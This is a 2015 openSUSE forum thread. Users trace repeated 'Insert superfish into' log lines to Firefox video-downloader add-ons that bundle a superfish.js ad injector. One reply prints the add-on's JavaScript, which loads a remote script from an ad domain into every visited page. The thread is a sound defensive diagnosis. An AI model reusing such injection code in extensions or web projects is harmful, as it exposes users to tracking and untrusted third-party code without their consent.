Mozilla Adware Superfish

One of my users causing logs to fill constantly with repeating lines seeking why, found superfish mentioned here :

https://forums.opensuse.org/showthread.php/505448-Lenovo-PCs-ship-with-extremely-dangerous-man-in-the-middle-adware-(-Windows-)?p=2696912#post2696912

with links to further info :

Lenovo slapped with lawsuit over dangerous Superfish adware | PCWorld

with comment:

A proposed class-action suit was filed late last week against Lenovo and Superfish, which charges both companies with “fraudulent” business practices and of making Lenovo PCs vulnerable to malware and malicious attacks by pre-loading the adware.

Plaintiff Jessica Bennett said her laptop was damaged as a result of Superfish, which was called “spyware” in court documents. She also accused Lenovo and Superfish of invading her privacy and making money by studying her Internet browsing habits.

Software Privdog worse than Superfish - Hanno's blog

with comment:

There is a software called Privdog. It totally breaks HTTPS security in a similar way as Superfish.

providing reference to article: Facebook

where written:

Superfish uses a third party library from a company named Komodia to modify the Windows networking stack and install a new root Certificate Authority (CA), allowing Superfish to impersonate any SSL-enabled site. The new root CA undermines the security of web browsers and operating systems, putting people at greater risk. The stated reason for this inspection functionality is to enable the Superfish Visual Search capability that looks at people’s search queries and makes suggestions based on proprietary processes.

more worrying:

the Superfish software can see all of the computer user’s activity, including banking, email and Facebook traffic. The second problem is the use and installation of a new root CA,


Aug 04 08:09:24 linux-52pn firefox.desktop[13318]: Insert superfish into: about:preferences
Aug 04 08:09:25 linux-52pn firefox.desktop[13318]: Insert superfish into: about:blank
Aug 04 08:09:47 linux-52pn firefox.desktop[13318]: Insert superfish into: about:addons
Aug 04 08:09:47 linux-52pn firefox.desktop[13318]: Insert superfish into: about:newtab
Aug 04 08:09:50 linux-52pn firefox.desktop[13318]: Insert superfish into: https://services.addons.mozilla.org/en-US/firefox/discovery/pane/38.0.1/Linux/normal#{%22{972ce4c6-7e08-4474-a285-3208198ce6fd}%22:{%22name%22:%22Default%22,%22version%22:%2238.0.1%22,%22type%22:%22theme%22,%22userDisabled%22:true,%22isCompatible%22:true,%22isBlocklisted%22:false},%22susefox@opensuse.org%22:{%22name%22:%22openSUSE%20Firefox%20Extensions%22,%22version%22:%221.0.2%22,%22type%22:%22extension%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22jid1-OoNOA6XBjznvLQ@jetpack%22:{%22name%22:%22GNotifier%22,%22version%22:%221.8.5%22,%22type%22:%22extension%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22jid1-KWFaW5zc0EbtBQ@jetpack%22:{%22name%22:%22YouTube%20Video%20Downloader%20-%20For%20Context%20Menu%22,%22version%22:%220.1.1-signed%22,%22type%22:%22extension%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22info@youtube-mp3.org%22:{%22name%22:%22YouTube%20mp3%22,%22version%22:%221.0.9.1-signed%22,%22type%22:%22extension%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22paulsaintuzb@gmail.com%22:{%22name%22:%22Youtube%20Downloader%20-%204K%20Download%22,%22version%22:%225.7.4.1-signed%22,%22type%22:%22extension%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22captiondownloader@hiephm.com%22:{%22name%22:%22YouTube%20Caption%20Downloader%22,%22version%22:%222.3.1-signed%22,%22type%22:%22extension%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22626160@personas.mozilla.org%22:{%22name%22:%22Cola%22,%22version%22:%220%22,%22type%22:%22theme%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22gmp-gmpopenh264%22:{%22name%22:%22OpenH264%20Video%20Codec%20provided%20by%20Cisco%20Systems,%20Inc.%22,%22version%22:%221.4%22,%22type%22:%22plugin%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22{0ac05972-878a-da26-5064-b268835efaa5}%22:{%22n
Aug 04 08:09:56 linux-52pn firefox.desktop[13318]: Insert superfish into: https://www.mozilla.org/en-US/plugincheck/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=plugincheck-update


The app seems insert into pages opened by browser:


Aug 04 08:09:56 linux-52pn firefox.desktop[13318]: Insert superfish into: https://www.mozilla.org/en-US/plugincheck/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=plugincheck-update
Aug 04 08:11:46 linux-52pn firefox.desktop[13318]: Insert superfish into: https://www.mozilla.org/en-US/plugincheck/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=plugincheck-update
Aug 04 08:12:12 linux-52pn firefox.desktop[13318]: Insert superfish into: https://duckduckgo.com/?q=current%20version%20plugin%20Native%20Client
Aug 04 08:12:12 linux-52pn firefox.desktop[13318]: Insert superfish into: https://duckduckgo.com/post2.html
Aug 04 08:12:31 linux-52pn firefox.desktop[13318]: Insert superfish into: https://en.wikipedia.org/wiki/Google_Native_Client
Aug 04 08:13:35 linux-52pn firefox.desktop[13318]: Insert superfish into: about:newtab
Aug 04 08:13:41 linux-52pn firefox.desktop[13318]: Insert superfish into: https://duckduckgo.com

For now appears superfish removed with the app: Youtube Downloader 4K - Video Downloader 5.7.4.1-signed
The App: https://addons.mozilla.org/en-US/firefox/addon/media-downloader/
Version 5.7.4.1-signed Info
April 23, 2015
Released under Mozilla Public License, version 2.0

How to prevent it being re-installed ?

And on which version of openSUSE are you seeing this?

On 2015-08-04 06:56, paulparker wrote:
>
> One of my users causing logs to fill constantly with repeating lines
> seeking why, found superfish mentioned here :

And what openSUSE version is that user with problems using? And what
Firefox? I tried searching for a superfix plugin or addon, and I didn’t
find any.


Cheers / Saludos,

Carlos E. R.

(from 13.1 x86_64 “Bottle” (Minas Tirith))

this is a strange thread, afaik there is no superfish for linux, it seams the addon you got scans web pages to detect embedded video’s, that’s what you wanted isn’t it, as google goes out of it’s way to prevent grabbing youtube content, mozilla usually scans addons for malware but anything is possible, I can tell you what I use to grab video’s.
For youtube only
https://addons.mozilla.org/en-us/firefox/addon/download-youtube/
for most other sites including youtube I use flashgot (it has a media detector)
https://addons.mozilla.org/en-us/firefox/addon/flashgot/
none of these work with mms, but that’s a different issue.

ps the above addons are both open source and if you try looking for it you can find it, I do believe they’re clean.

For now appears superfish removed with the app: Youtube Downloader 4K - Video Downloader 5.7.4.1-signed
The App: https://addons.mozilla.org/en-US/fir…ia-downloader/
Version 5.7.4.1-signed Info
April 23, 2015
Released under Mozilla Public License, version 2.0

I checked that plugin (https://addons.mozilla.org/en-US/firefox/addon/media-downloader/ ) and it’s clean, the reason it’s so big (10.2MiB) is it carries binary copies of ffmpeg for 2 platforms (Win and OS-X).
I’m re-reading your post and can’t make heads or tales of it.
superfish is a windows binary it can do nothing under Linux, did you maybe use mozilla sync and import something from Windows, even with sync Firefox only syncs addons from it’s site and a win dll on it’s own running under a regular user account can do very little under Linux, worst case scenario delete your ~.mozilla folder and create a new clean profile.

browsing the content of
https://addons.mozilla.org/firefox/downloads/latest/456252/addon-456252-latest.xpi
I see a file called
superfish.jsfrom the content of that file I’m thinking it could be an ad injector although it could be malware it has nothing to do with Lenovo’s man in the middle attack, the js code is there (in the link and in the xpi) you can check it out, I’m surprised mozilla hasn’t removed this add-on, maybe injecting ads isn’t thought of as a bad thing as every toolbar does it?
In short you weren’t a victim of Lenovo’s man in the middle blander, you wore a victim of an ad injector, that add-on is bad there are better ones (see the one’s I mentioned a few posts above), being MPL this proves that even open source projects can make bad choices (mediainfo includes adware in it’s windows binaries) unfortunately it’s the way the internet works (on ads), I would say get your self an ad blocker but that’s your choice.

On 2015-08-04 22:06, I A wrote:

> I’m re-reading your post and can’t make heads or tales of it.
> superfish is a windows binary it can do nothing under Linux, did you
> maybe use mozilla sync and import something from Windows, even with sync

I’m now guessing that he is admin for a network, and one of the users
there, using a Windows machine, has that thing. And he wants to block it
externally, perhaps in the firewall. Or something of the sort.

I don’t think that’s possible. That malware inserts or replaces a master
root certificate, on the system. Any false site those people want to,
will be certified to be the proper web page for your bank, when it is
instead a mafia site — but the browser will say it is the correct site.
You can do nothing externally to avoid this situation.

What I would do, perhaps, is install Windows Server in a machine, create
a domain, then force all machines to only log in that Windows Domain
(AD), and then impose my own rules. AD allows very fine controls on
programs and users. Specifically, you can deny them the right to install
software.

I don’t know if this is doable via samba 4 and ldap. They are trying.

If AD is not an option, then I would give users only users accounts, not
privileged accounts. Anybody that complains and fights, fired. >:-)


Cheers / Saludos,

Carlos E. R.
(from 13.1 x86_64 “Bottle” at Telcontar)

On 2015-08-04 22:26, I A wrote:
>
> browsing the content of
> http://tinyurl.com/od4l52s


https://addons.mozilla.org/firefox/downloads/latest/456252/addon-456252-latest.xpi

What’s the name of that addon? :-?

> In short you weren’t a victim of Lenovo’s man in the middle blander, you
> wore a victim of an ad injector, that add-on is bad there are better
> ones (see the one’s I mentioned a few posts above), being MPL this
> proves that even open source projects can make bad choices (mediainfo
> includes adware in it’s windows binaries) unfortunately it’s the way the
> internet works (on ads), I would say get your self an ad blocker but
> that’s your choice.

wow :-o

Maybe that addon could be reported to mozilla people. :-?


Cheers / Saludos,

Carlos E. R.
(from 13.1 x86_64 “Bottle” at Telcontar)

the name of the addon is
Youtube Downloader 4K - Video Downloader
the problem with it is this part




  1.                         //var injectUrl = "www.superfish.com/ws/sf_main.jsp?dlsource=ylrckcg&CTID=ffpauldn"; 
  1.                         var injectUrl = "www.best-deals-products.com/ws/sf_main.jsp?dlsource=ylrckcg&CTID=ffpauldn"; 
  1.  
  1.                         if( document.location.href.indexOf("https:") === 0 ){ 
  1.                                 injectUrl = "https://" + injectUrl; 
  1.                         } 
  1.                         else{ 
  1.                                 injectUrl = "http://" + injectUrl; 
  1.                         } 
  1.  
  1.                         var script = document.createElement("script"); 
  1.                         script.setAttribute( "src", injectUrl ); 
  1.                         document.head.appendChild( script ); 
  1.  
  1.                 } 
  1.  
  1.         } 



re-reading the content of the js it does seam to be connected with www.superfish.com and those are the same people that did the MiM deal with lenoveo, but as far as I can tell this addon, injects ads on certain sites it does not do a classic MiM attack

edit.
I was just at mozilla’s site (as a logged in user) and there doesn’t seam to be a way to report “bad addons”, the only thing you could do is write a bad review. That’s disappointing seeing how mozilla plans on blocking all adons that do not come from addons.mozilla.org and don’t have a signature
Mozilla to Enforce Signing for Firefox Extensions Soon | Threatpost
this proves that even signed and checked addons are not safe.

On 2015-08-04 23:06, I A wrote:

> the name of the addon is
> Youtube Downloader 4K - Video Downloader

Huh. I have:

“Flash Video Downloader - YouTube HD Downloader [4K] 7.3.1.1-signed”, by
pos1t1ve. Homepage is http://www.flashvideodownloader.org/

Is it the same? :-?

> the problem with it is this part

> re-reading the content of the js it does seam to be connected with
> www.superfish.com and those are the same people that did the MiM deal
> with lenoveo, but as far as I can tell this addon, injects ads on
> certain sites it does not do a classic MiM attack

Huh.


Cheers / Saludos,

Carlos E. R.
(from 13.1 x86_64 “Bottle” at Telcontar)

it’s not the same add-on but reading the comments on mozilla’s site
https://addons.mozilla.org/en-US/firefox/addon/flash-video-downloader/


Malware Superfish, be careful! Rated 1 out of 5 stars

by amar7 on July 10, 2015 · permalink · translate

Unacceptable that it is not possible to unselect the malware, changes settings and other Firefox things.

The official reply from Mozilla is also disappointing that this is not exactly the definition of malware, so they leave it. So I cant rely on my Add Ons being Malware free and clean anymore.

thumbsdown


and I just downloaded it from
https://addons.mozilla.org/firefox/downloads/latest/6584/addon-6584-latest.xpi
and yes the file superfish.js is included in
flash_video_downloader_youtube_hd_download_4k-7.3.1-an+fx.xpi\modules\superfish.js (xpi’s are zip’s)
it’s identical with the one from Youtube Downloader 4K - Video Downloader.
and the one you;re using has over a million users.
lol mozilla spreading the injections.

“Flash Video Downloader - YouTube HD Downloader [4K] 7.3.1.1-signed” is bad to remove or not is your choice?

I just re-checked the 2 video download add-ons I use and they both seam clean (they do not include that bad js)
https://addons.mozilla.org/en-us/firefox/addon/download-youtube/
https://addons.mozilla.org/en-us/firefox/addon/flashgot/

but this is a terrible practice from mozilla what am I supposed to check every add-on to be sure it doesn’t have adware?

It would appear that on Aug 4, I A did say: {liberaly snipped}

> it’s not the same add-on but reading the comments on mozilla’s site
> > THE OFFICIAL REPLY FROM MOZILLA IS ALSO DISAPPOINTING THAT THIS IS NOT
> > EXACTLY THE DEFINITION OF MALWARE, SO THEY LEAVE IT. SO I CANT RELY ON
> > MY ADD ONS BEING MALWARE FREE AND CLEAN ANYMORE.
> and yes the file superfish.js is included in
> flash_video_downloader_youtube_hd_download_4k-7.3.1-an+fx.xpi\modules\superfish.js
> (xpi’s are zip’s)
> it’s identical with the one from Youtube Downloader 4K - Video
> Downloader.
> “Flash Video Downloader - YouTube HD Downloader [4K] 7.3.1.1-signed” is
> bad to remove or not is your choice?
>
> I just re-checked the 2 video download add-ons I use and they both seam
> clean (they do not include that bad js)
> https://addons.mozilla.org/en-us/firefox/addon/download-youtube/
> https://addons.mozilla.org/en-us/firefox/addon/flashgot/
>
> but this is a terrible practice from mozilla what am I supposed to check
> every add-on to be sure it doesn’t have adware?

Damn. And I thought Firefox was supposed to be a security conscious browser.

Anybody know if my favorite downloader is clean or dirty?

it’s “MP4 Downloader 1.3.3.1-signed”

from http://jhartz.github.io/mp4downloader/


JtWdyP

got a copy from here
MP4 YouTube Downloader 1.3.3.1-signed
https://addons.mozilla.org/en-US/firefox/addon/mp4-downloader/
looks clean to me ie it does not include Superfish.js

ps regarding robin_listas question about Flash Video Downloader - YouTube HD Downloader [4K] 7.3.1.1-signed
they do write that their add-on includes adware and it’s supposed to be off by default, from
https://addons.mozilla.org/en-US/firefox/addon/flash-video-downloader/

Please note, that we inject optional ads (Superfish). If you do not want to support us, you can turn them off in extension setting. Superfish ads are disabled by default and promoted in Opt-In dialog box according to Mozilla non-surprise police. Superfish help users to enhance their shopping experience and save money. To know more, please read our policy or contact them directly.

I really don’t know about mozilla’s policy.

On 2015-08-05 01:18, JtWdyP wrote:

> Damn. And I thought Firefox was supposed to be a security conscious browser.

But addons are not really part of Firefox. They are third party.


Cheers / Saludos,

Carlos E. R.

(from 13.1 x86_64 “Bottle” (Minas Tirith))

On 2015-08-05 01:56, I A wrote:

> ps regarding robin_listas question about Flash Video Downloader -
> YouTube HD Downloader [4K] 7.3.1.1-signed

> they do write that their add-on includes adware and it’s supposed to be
> off by default, from
> http://tinyurl.com/k8rpzyy
>> Please note, that we inject optional ads (Superfish). If you do not want
>> to support us, you can turn them off in extension setting. Superfish
>> ads are disabled by default and promoted in Opt-In dialog box according
>> to Mozilla non-surprise police. Superfish help users to enhance their
>> shopping experience and save money. To know more, please read our policy
>> or contact them directly.

Well, I have removed it.

When I installed it some time ago I didn’t see the comments about
superfish. It seems they added this thing later on.

What I haven’t noticed is when are the adverts shown? I haven’t noticed
any :-? What do they do, track the pages I browse, even without
downloading videos?

Anyway, I mostly used the addon to find out possible download streams.
The real download I usually do from the CLI, with a command I got from
packman :wink:

Now I will always look and download from the CLI.


Cheers / Saludos,

Carlos E. R.

(from 13.1 x86_64 “Bottle” (Minas Tirith))

First up thanks to all for your replies ;- )

My place usually runs two personal computers operating using openSUSE 13.2 GNOME with my back up machine used by resident teen and visitors.

Was searching for what causing logs on my back up machine (used by teens&visitors) was constantly filling up with “firefox.desktop” “console.error” messages.

My attention focus quickly on words: “Insert superfish into” apparently every web page opened by users mozilla then found quickly information about superfish as bug or abusive software.

Applications chosen and installed by individual users (this time Mozilla) increases risk.

Removed teen users Mozilla apps and required he set himself a new password.

Other users of same computer, self included, displayed no indication of similar issues.

Felt best post about here for wiser minds to consider :- )